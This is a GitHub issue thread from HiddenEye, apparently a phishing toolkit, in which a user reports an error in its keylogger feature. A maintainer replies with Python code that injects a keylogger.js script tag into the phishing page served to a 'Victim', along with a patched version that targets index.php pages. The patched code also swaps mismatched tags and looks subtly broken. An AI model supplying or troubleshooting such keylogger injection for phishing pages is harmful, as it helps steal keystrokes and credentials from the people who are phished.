### ISSUE TITLE
Keylogger Error

### ISSUE THREAD

**Issue by jepunband** [DarkSecDevelopers/HiddenEye#195]
Tried creating the file index.html but didn't work either. Even when selected "N", the error still pops out.

![screenshot_20190129-122444](https://user-images.githubusercontent.com/46950575/51884388-0cfc4e00-23c2-11e9-86d3-db0604fba98d.png)

**Comment by sTiKyt** [comment]
@An0nUD4Y xD

**Comment by An0nUD4Y** [comment]
@jepunband , Let me know which attack you are using.

_Let me explain it further, Currently it will work only with those templates/webpages which has index.html as their default page, For those templates/webpages which has index.php or index2.html, or mobile.html this will not work..,, I will further resolve this issue in few days.., OR You can do it change with yourself, Let Me explain it  _  _JUST EDIT THE  Defs/Actions.py   FROM LINE 312 TO 330  (LIKE BELOW)_

> 
> > def addingkeylogger():
> >      custom = input(_("\n{1}Do you want to Deploy a Keylogger against Victim{0}(Y/N) \n\n{0}YOUR CHOICE (Y/N) >>> {1}").format(RED, DEFAULT))
> >      if 'Y' in custom or 'y' in custom:
> >          with open('Server/www/index.html') as f:
> >              read_data = f.read()
> >          c = read_data.replace('</div>', '</div><script src="keylogger.js"></script>')
> >          f = open('Server/www/index.html', 'w')
> >          f.write(c)
> >          f.close()
> >          print(_("\n-------------------------------\n{0}Keylogger Added {1}Successfully.\n-------------------------------").format(RED, DEFAULT))
> >          
> >          sleep(0.03) 
> >      else:
> >          with open('Server/www/index.html') as f:
> >              read_data = f.read()
> >          c = read_data.replace('</div><script src="keylogger.js"></script>', '</div>')
> >          f = open('Server/www/index.html', 'w')
> >          f.write(c)
> >          f.close()
> 

         
INTO 


> 
> > [def addingkeylogger():
> >      custom = input(_("\n{1}Do you want to Deploy a Keylogger against Victim{0}(Y/N) \n\n{0}YOUR CHOICE (Y/N) >>> {1}").format(RED, DEFAULT))
> >      if 'Y' in custom or 'y' in custom:
> >          with open('Server/www/index.php') as f:
> >              read_data = f.read()
> >          c = read_data.replace('</index>', '</index><script src="keylogger.js"></script>')
> >          f = open('Server/www/index.php', 'w')
> >          f.write(c)
> >          f.close()
> >          print(_("\n-------------------------------\n{0}Keylogger Added {1}Successfully.\n-------------------------------").format(RED, DEFAULT))
> >          
> >          sleep(0.03) 
> >      else:
> >          with open('Server/www/index.php') as f:
> >              read_data = f.read()
> >          c = read_data.replace('</title><script src="keylogger.js"></script>', '</index>')
> >          f = open('Server/www/index.php', 'w')
> >          f.write(c)
> >          f.close()

>          

ONLY FOR THOSE WHO ARE USING THE MODULES WITH _INDEX.PHP_ AS DEFAULT PAGE.
UNLESS WAIT FOR ITS FIXING, I WILL FIX IT, WHEN I WILL GET TIME.... TILL THAT TIME YOU CAN TRY OTHER MODULES WITH _INDEX.HTML_ AS DEFAULT PAGE.

**Comment by sTiKyt** [comment]
@An0nUD4Y please check if there any index.php instead of index.html and message users.. We still have this, and i think this bug

**Comment by An0nUD4Y** [comment]
@sTikyt , It's now fixed..
